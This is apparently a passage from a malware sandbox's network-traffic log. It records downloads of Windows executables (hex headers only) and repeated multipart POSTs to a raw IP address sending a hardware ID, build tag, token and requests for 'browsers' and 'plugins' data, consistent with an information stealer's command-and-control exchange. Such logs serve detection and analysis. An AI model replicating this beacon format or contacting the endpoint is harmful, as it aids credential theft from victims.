00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:09 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:10 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:13 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:13 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 07:28:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHCHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 43 33 43 30 30 35 46 39 45 36 34 31 32 30 30 32 31 34 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 2d 2d 0d 0a Data Ascii: ------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="hwid"59C3C005F9E64120021454------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="build"default10------JEGHJKFHJJJKJJJJKEHC--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFIHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 2d 2d 0d 0a Data Ascii: ------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="message"browsers------FBFCGIDAKECGCBGDBAFI--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHIHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"plugins------BKECAEBGHDAEBFHIEGHI--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDGHost: 185.172.128.76Content-Length: 6871Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDGHost: 185.172.128.76Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 